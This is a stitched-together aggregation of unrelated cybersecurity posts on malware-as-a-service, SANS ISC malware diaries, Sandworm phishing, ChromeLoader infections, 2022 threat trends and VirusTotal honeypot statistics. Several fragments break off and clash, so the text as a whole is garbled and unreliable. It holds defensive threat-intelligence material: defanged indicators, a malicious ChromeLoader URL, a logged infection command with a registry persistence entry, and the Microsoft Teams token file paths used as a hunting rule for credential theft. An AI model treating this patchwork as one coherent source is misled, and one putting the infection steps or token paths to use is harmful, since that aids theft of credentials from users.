ChatGPT-generated code isn’t that good, but it’s a start. And the technology will only get better. Where it matters here is that it gives less skilled hackers—script kiddies—new capabilities.

malware_og.jpg

The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

With the explosive growth of technology, businesses are more vulnerable than ever to malicious cyber attacks. And as cybercriminals become more sophisticated, new methods of attack are popping up left and right.

To add fuel to the fire, the average cost of a data breach increased from $3.86 million to $4.24 million in 2021. That’s costly enough to put most SMBs into the red. Not to mention the reputational damage it can cause for your brand.

Avoid this dreaded fate by protecting yourself against the latest cybersecurity developments — like Malware-as-a-Service (MaaS) — to protect your networks, data, systems, and business reputation.

If you’ve never heard of Malware-as-a-Service (MaaS) before, don’t fret. This article is for you.

We’ll teach you everything you need to know about Malware-as-a-Service and wrap it up by sharing some best practices for protecting your proprietary company data from potential threats.

Let’s dive in.

What is Malware-as-a-Service (Maas)?

Malware-as-a-Service (MaaS) is a type of cyber attack in which criminals offer malware and deployment services to other hackers or malicious actors on the internet.

These services typically are available on the dark web. When purchased, a bad actor can carry out various malicious activities, such as stealing sensitive information, disrupting computer systems, or encrypting data and demanding a ransom to unlock it.

Some of the most common types of malware include the following:

Viruses: Programs that can replicate themselves and spread to other computers. They can cause various problems, such as disrupting computer operations, stealing information, or damaging files.
Trojan horses: These programs masquerade themselves as legitimate software but can carry out malicious activities, such as stealing data or giving attackers unauthorized access to a computer.
Worms: A self-replicating program that can spread across networks, disrupting computer operations and consuming network resources.
Adware: Software that displays unwanted advertisements on a computer. It can be intrusive and annoying and sometimes track a user’s online activities.
Ransomware: Encryption of a victim’s data with the demand for a ransom payment to unlock it. It can devastate businesses, resulting in losing important data and files.
Spyware: Software designed to collect information about a user’s online activities without their knowledge or consent to steal sensitive information (like financial statements and passwords).
Bots: Often used in conjunction with other types of malware, such as viruses or worms. For example, a virus could infect a computer and then download and install a bot, which could carry out malicious activities on that computer or other computers on the network.

MaaS makes it easier for cybercriminals to launch attacks, as they can purchase and use pre-made malware without developing it themselves. This distinction can make it harder for law enforcement, cybersecurity experts, and IT teams to track down the people responsible for the attacks.

And sadly, cyber-attacks are industry agnostic. For example, in the transportation industry, cybercriminals exploit vulnerabilities of electronic logging devices and steal valuable information from cloud-connected trucks.

MaaS is also a significant threat to online job boards like Salarship, Indeed, UpWork, or any other platform where job applications are stored. Attackers can easily access the personal data of thousands or millions of people by targeting these sites.

The bottom line: As a business with priority company data, it’s essential to be aware of the different types of malware and take the necessary precautionary steps to protect against these heinous services.

Ransomware-as-a-Service (RaaS) vs. Malware-as-a-Service (MaaS)

Ransomware falls under the umbrella of malware. But what’s the difference between Ransomware-as-a-Service (RaaS) and Malware-as-a-Service (MaaS)?

The main difference between MaaS and RaaS is the specific type of malware offered as a service. MaaS involves the development and deployment of any malware, while RaaS specifically consists of the development and deployment of ransomware.

Ransomware is a type of malware that restricts access to the infected computer system or its data and demands a ransom payment to regain access. It typically spreads through phishing emails, malicious websites, and targeted exploits.

MaaS and RaaS are online services on the dark web that make it easy for anyone with no experience or knowledge to launch an attack.

In some RaaS cases, the attackers may steal the victim’s data and hold it for ransom, demanding payment to return it to the victim. Or the attackers may encrypt the victim’s data and demand payment to unlock it without stealing it.

Regardless, the goal of ransomware is to make money by extorting the victim.

How to protect your business against MaaS

As malware becomes more sophisticated and accessible, it’s imperative to have some defense programs in place that can offer your extra business protection against bad actors.

According to a recent study, 64% of Americans would blame the company, not the hacker, for losing personal data.

Thankfully, there are ways to lessen the impact. ​​A report from Cisco states that adhering to General Data Protection Regulations (GDPR) has been shown to minimize the effects of a data breach.

Why? Because if a company complies with the GDPR, attackers might not find any data to exploit. And with the help of a privacy policy generator, your business can be GDPR-compliant with the click of a button.

Here are a few additional steps that your business can take to protect itself from MaaS:

Implement strong network security measures, such as a web application firewall, intrusion detection, and secure passwords.
Regularly update and patch all software and operating systems to fix known vulnerabilities.
Educate employees about Malware-as-a-Service risks and how to avoid them, such as not opening suspicious email attachments or visiting untrusted websites.
Use reputable anti-virus and anti-malware software and regularly scan the network for signs of infection.
Back up any necessary data regularly so your business can quickly restore its operations if anything goes south.

One of your company’s most significant assets is its data privacy and reputation, which directly affects how much your business is worth. So it’s critical to protect it against MaaS with a strong and well-implemented cybersecurity plan.

Wrapping up

Cybercriminals no longer need a strong technical background to pull off a malicious hack. The MaaS model has made it possible for anyone to become a cybercriminal.

But that doesn’t mean you have to avoid the internet forever — which is pretty challenging to do in today’s day and age.

With preventative measures and a robust cybersecurity strategy, you can sleep soundly at night, knowing your company data is safe from a MaaS attack.

For more advice on staying secure online, check out the AT&T Cybersecurity blog for additional insight.

large.png

Yesterday Brad wrote an interesting diary[1] about a piece o malware based on AutoIT. Funny, I was also analyzing a sample that has been written in the same language. I don’t know exactly the source (it was spotted via a hunting ruile) but it seems to target the same people (based on the file name). Mine was delivered in a RAR archive called “doc-Impostos_514281.rar” (SHA256:84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04). The VT score is very low: 1/61[2].

Got this file attachment this week pretending to be from HSBC Global Payments and Cash Management. The attachment payment_copy.pdf.z is a rar archive, kind of unusual with this type of file archive but when extracted, it comes out as a double extension with pdf.exe. The file is a trojan infostealer and detected by multiple scanning engines. 

Using CyberChef Forensics -> Extract Files, you can view a list of files part of the executable from the .exe, .zlib and various mp3 and png.

 

 

Saving some of the files to review and analyze them:

Indicators of Compromise

Filename: payment_copy.pdf.z -> RAR archive data
SHA256: 37da8f89540f4dae114f1f55cfd4d89be9582fbd480ac6ed6c34ac04ec8d576b
SSDEEP: 12288:jiE0YCjbwMh6ny+h+n6SN/PAQDnNNTtcvCEYLPQE5FiER3RiSbhXwS:eE3K0Mh6nyU+6SOQ77lPQaFpbeS

Filename: payment_copy.pdf.exe
IPs: 3.232.242[.]170, 52.20.78[.]240, 54.91.59[.]199, 65.108.213[.]43, 209.197.3[.]8
Domains: api.ipify[.]org, api.ipify.org.herokudns[.]com, mail.reousaomilia[.]gr, reousaomilia[.]gr, www.inkscape[.]org
SHA256: 3ccaf74f465a79ec320fdb7e44ae09551f4348efd3bf8bf7b3638cc0c1cd8492

[1] https://www.virustotal.com/gui/file/37da8f89540f4dae114f1f55cfd4d89be9582fbd480ac6ed6c34ac04ec8d576b
[2] https://www.virustotal.com/gui/file/3ccaf74f465a79ec320fdb7e44ae09551f4348efd3bf8bf7b3638cc0c1cd8492
[3] https://gchq.github.io/CyberChef/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A bunch of Android OEM signing keys have been leaked or stolen, and they are actively being used to sign malware.

Łukasz Siewierski, a member of Google’s Android Security Team, has a post on the Android Partner Vulnerability Initiative (AVPI) issue tracker detailing leaked platform certificate keys that are actively being used to sign malware. The post is just a list of the keys, but running each one through APKMirror or Google’s VirusTotal site will put names to some of the compromised keys: Samsung, LG, and Mediatek are the heavy hitters on the list of leaked keys, along with some smaller OEMs like Revoview and Szroco, which makes Walmart’s Onn tablets.

This is a huge problem. The whole system of authentication rests on the assumption that signing keys are kept secret by the legitimate signers. Once that assumption is broken, all bets are off:

Samsung’s compromised key is used for everything: Samsung Pay, Bixby, Samsung Account, the phone app, and a million other things you can find on the 101 pages of results for that key. It would be possible to craft a malicious update for any one of these apps, and Android would be happy to install it overtop of the real app. Some of the updates are from today, indicating Samsung has still not changed the key.

400

cybercenter-1200x630-e_1.jpg

Windows 10 supports various virtual drives natively and can recognize and use ISO, VHD and VHDX files. The file included as an attachment with this email, when extracted appears in the email as a PDF but is is in fact a VHD file.

 

 

This email received this week with a zip file attachment, after extraction, contained a file with a VHD extension. Using Linux file command, identified the file as a Microsoft Disk Image.

 

 

Windows 10 File Browser Listing

 

 

File was submitted to Virustotal [1] for analysis with very little detection and was identified as a Trojan by two scan engines. Sandbox analysis also indicated it may try to detect the virtual machine to hinder analysis, analysis by sandbox was minimal. Sandbox indicated the original filename was 7zS.sfx.exe0 vs 938374740_pdf.vhd

Attempt to copy the file to Windows 10 Sandbox [2] crashed the system. A second attempt to copy the file resulted with the same outcome.

 

 

Indicators

 

filename: 938374740_pdf.vhd, 7zS.sfx.exe0
SHA256: ea9aca145f23464a7739c7b3b6a8f8c7ce65bdd6f868e0a87a65a9a1291ee960

 

[1] https://www.virustotal.com/gui/file/ea9aca145f23464a7739c7b3b6a8f8c7ce65bdd6f868e0a87a65a9a1291ee960
[2] https://isc.sans.edu/diary/Malware+Analysis+with+elasticagent+and+Microsoft+Sandbox/27248
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

malware-icon.jpg

Malware may be the biggest threat to your organization. If a malware attack is successful, it can result in lost revenue, unexpected down time, stolen data, and more costly consequences. There are multiple kinds of malware, and attackers are continually investing in more complex, harder-to-detect versions. Now is the time to take proactive steps to … 10 Most Common Types of Malware Attacks

malware-icon.jpg

Malware may be the biggest threat to your organisation. If a malware attack is successful, it can result in lost revenue, unexpected down time, stolen data, and more costly consequences. There are multiple kinds of malware, and attackers are continually investing in more complex, harder-to-detect versions. Now is the time to take proactive steps to … 10 Most Common Types of Malware Attacks

2022-10-21-isc-diary-image-01a.jpg

Introduction

635024aea5fc5fa22d7b3ea3_autolt%20iocs.j

AutoIt is a scripting language designed for general purpose development. However, like many freeware languages, it has been exploited for malicious intent. Recently Darktrace captured the whole kill-chain of an AutoIt malware compromise, from delivery via email to payload download and subsequent C2.

This week’s email is all about Covid for all suppliers to declare their vaccination status, but the date is almost 1 year old. 

 

After saving the attachments, it provided a case sensitive password (W485) to extract the ISO attachment into file Invoice_10-12_document_9054.iso. To examine the content of the ISO, I used Linux to mount locally the ISO to view and analyze its content.

Mounting the ISO with Linux:
mount -o loop Invoice_10-12_document_9054.iso /mnt

 

The ISO contains two files that appear interesting, two files are pictures and two are just random text. 

 

 

The first file of interest to check out is licentiousness.cmd:

 

 

The second file of interest is relaxare.dat file with Virustotal and there was no match, then uploaded the file for analysis with the following results which matched a Banking trojan by Proofpoint and Snort.

 

Indicators

104.248.81.57
tracksupernova[.]com
53a933e42832829a18d7608e6b07e3620b4d1c8b8d19226dfecae237041d625c  relaxare.dat

[1] https://www.virustotal.com/gui/file/53a933e42832829a18d7608e6b07e3620b4d1c8b8d19226dfecae237041d625c
 

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

20220925-092057.png

When you lookup a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%MicrosoftTeamsCookies
%AppData%MicrosoftTeamsLocal Storageleveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file looks indeed for Teams cookies but even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family…

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops Blink.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.

In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.

From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).

The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.

State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.

“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware.” reads the report published by Recorded Future.

While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.

Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.

The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.

The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.

Experts noticed the presence of the same web page on multiple domains, it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.

Sandworm

The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited. The threat actors used the HTML smuggling technique. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 and JavaScript features. The malicious payloads are delivered via encoded strings in an HTML attachment or webpage. The malicious HTML code is generated within the browser on the target device which is already inside the security perimeter of the victim’s network.  

The researchers published a report that includes details about the malware and the C2 infrastructure.

The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

large.png

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

  

Initial infection 

 The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below is the results of a user that got infected 

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

 

C:UsersuserDownloadsStroud – Advanced Engineering Mathematics 4e.iso 

 

This ISO file contained the following files

files.zip

res.ico

Install.lnk

properties.bat

 

The user double clicked on the Properties.bat file that started the infection process.

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c “”D:properties.bat” “

Process Name: tar.exe

Process Command Line arguments: tar -xvf “files.zip” -C “C:UsersuserAppDataRoaming”

They established persistence with CurrentVersionRun key.

“opensubtitles-uploader.exe “k2eN”” /f. 

HKEY_CURRENT_USERS-1-5-21-740110469-27406-3214746-20027SOFTWAREMicrosoftWindowsCurrentVersion

C:UsersuserAppDataRoamingopensubtitles-uploaderopensubtitles-uploader.exe.

Connection to some malicious domains from happened from opensubtitles-uploader.exe.

C:UsersuserAppDataRoamingopensubtitles-uploaderopensubtitles-uploader.exe.

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com

 

Since the infection is coming from a user mounting and executing files in an ISO, the best way to stop this is to prevent a user from mounting the ISO by double clicking. Users are still able to Burn a CD from within windows if needed. If you have power users that need to open ISOs they can use compression utilities.  

 

Mubix (Rob Fuller) has a great article about how to disable this.(1).  Below, there are two different options to prevent users from double clicking ISO file to mount them.  The GPO method is a little more complete in protections, see the article for more details. We have deployed this in my environment to end users’ desktops and have not had any issues to this point nor any new infections via this method.

 

GPO 

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->  

Allow administrators to override Device Installation Restrictions Policies (enabled) 
Prevent Installation from devices that match any of these device IDs 

 Add this exact ID    

SCSICdRomMsft____Virtual_DVD-ROM_ 

 

Registry Setting 

HKEY_CLASSES_ROOTWindows.IsoFileshellmount 
Value “ProgrammaticAccessOnly” as REG_SZ 
 

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 

If you have done this or something similar, let us know. 

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:

Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.

Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.

Cybercriminals and state-sponsored threat actors

The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).

Figure 1 – Malicious requests by threat actor country of origin

Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).

We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.

The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spiderand Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.

The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.

Figure 2 - Malicious requests by targeted sector
Figure 2 – Malicious requests by targeted sector

New malware – wipers, OT/ICS malware and botnets

Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which is still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemicby a new DHS Cyber Safety Review Board.

The most interesting malware developments typically garner attention because of new malicious capabilities, who isdeploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.

Destructive wipers

Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.

OT/ICS-specific malware

OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.

Persistent and emerging botnets

Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNfilter, was active since 2019 but discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.

Remote Access Trojan (RAT)

ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.

Hacking groups

Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.

Hacktivists

More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and  distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.

Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.

Data extortion groups

LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.

Mitigation recommendations

The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.

The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:

Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. Monitor especially known data leaks for exposed credentials.
Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change defaults or easily guessable passwords on these IoT devices.
Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.

Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.

Threat hunting and incident response

Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.

[LEARN MORE]

The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.

serve.php?o=image&a=1296

Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.

read more

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify it. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, generally are not considered sensitive. Malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices. 
Examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that there are very different naming conventions and results from vendor to vendor.
virustotal results
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

Acronis

Alibaba

APEX

BitDefenderFalx

Bkav

CMC

CrowdStrike

Cybereason

Cylance

eGambit

Endgame

F-Prot

Invincea

Kingsoft

Malwarebytes

Paloalto

Qihoo-360

SUPERAntiSpyware

SymantecMobileInsight

TACHYON

tehtris

TotalDefense

trapmine

Trustlook

VBA32

Webroot

Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:
•    73 Providers from date range 6/7/2022 – 7/31/2022
•    82 Providers from date range 6/7/2022 – 9/3/2022
That means in the last month, there has been an increase of 9 vendors, although this doesn’t consider any vendors that may have also been removed at this time.

Suggested Threat Results

VirusTotal will also give general threat classifications that can help to give a good high-level picture. 

VT Threat Classification

Count of  VT Threat Classification

Percentage

trojan.shell/malkey

5579

52.43%

trojan.shell/linux

3816

35.86%

downloader.bash/miraia

299

2.81%

downloader.shell

277

2.60%

trojan.linux/mirai

119

1.12%

downloader.

118

1.11%

trojan.mirai/linux

92

0.86%

downloader.bash/linux

54

0.51%

trojan.linux/shell

53

0.50%

downloader.miraia/bash

31

0.29%

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots. Results Change Over Time We have already seen that results can be different between vendors; those vendors change and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, and this also changes the information received from a variety of tools. Looking at one example, it was seen that within a 6-hour period, the number of vendors seeing a particular hash as malware increased by 13, and the threat classification from VirusTotal also change from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity but the use of creating an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored results for a particular hash [5].

Different Provider Comparisons

So far, this has only focused on suggested classifications from VirusTotal. The naming of these threats from the various vendors also differs quite a bit and we see a much different number of results.

Provider

Number of Results

No Classification

Provider Data Not Available

Total

Avast

1273

519

0

1792

AVG

1273

34

485

1792

GData

1201

591

0

1792

DrWeb

1151

641

0

1792

MicroWorld-eScan

1132

660

0

1792

Ad-Aware

1130

662

0

1792

BitDefender

1128

664

0

1792

FireEye

1117

675

0

1792

Emsisoft

1079

695

18

1792

ALYac

1030

762

0

1792

Ikarus

1021

771

0

1792

AhnLab-V3

971

821

0

1792

TrendMicro

942

850

0

1792

TrendMicro-HouseCall

941

851

0

1792

CAT-QuickHeal

915

877

0

1792

Kaspersky

796

996

0

1792

Comodo

775

1017

0

1792

Arcabit

756

1036

0

1792

Lionic

714

1078

0

1792

Avira

701

1091

0

1792

VIPRE

692

262

838

1792

Cynet

686

1077

29

1792

ESET-NOD32

628

1164

0

1792

MAX

622

1170

0

1792

Tencent

562

1230

0

1792

Microsoft

533

1257

2

1792

Fortinet

524

1239

29

1792

Cyren

523

1269

0

1792

Rising

517

1275

0

1792

McAfee-GW-Edition

501

1290

1

1792

Sophos

496

1284

12

1792

McAfee

486

1305

1

1792

Sangfor

458

1158

176

1792

Symantec

422

1039

331

1792

NANO-Antivirus

405

1387

0

1792

ZoneAlarm

305

1478

9

1792

Google

188

60

1544

1792

F-Secure

155

1637

0

1792

Antiy-AVL

121

890

781

1792

ClamAV

107

1671

14

1792

SentinelOne

94

1698

0

1792

Elastic

74

1707

11

1792

MaxSecure

72

1710

10

1792

Jiangmin

71

1721

0

1792

Avast-Mobile

70

1722

0

1792

BitDefenderTheta

59

1729

4

1792

Zillya

56

1736

0

1792

VirIT

51

1726

15

1792

ViRobot

48

1744

0

1792

Gridinsoft

23

1758

11

1792

Yandex

22

1770

0

1792

Baidu

7

1785

0

1792

Panda

5

1780

7

1792

K7AntiVirus

2

1790

0

1792

K7GW

2

1790

0

1792

CMC

0

995

797

1792

TACHYON

0

1792

0

1792

Malwarebytes

0

1774

18

1792

Trustlook

0

1792

0

1792

Zoner

0

1792

0

1792

BitDefenderFalx

0

1781

11

1792

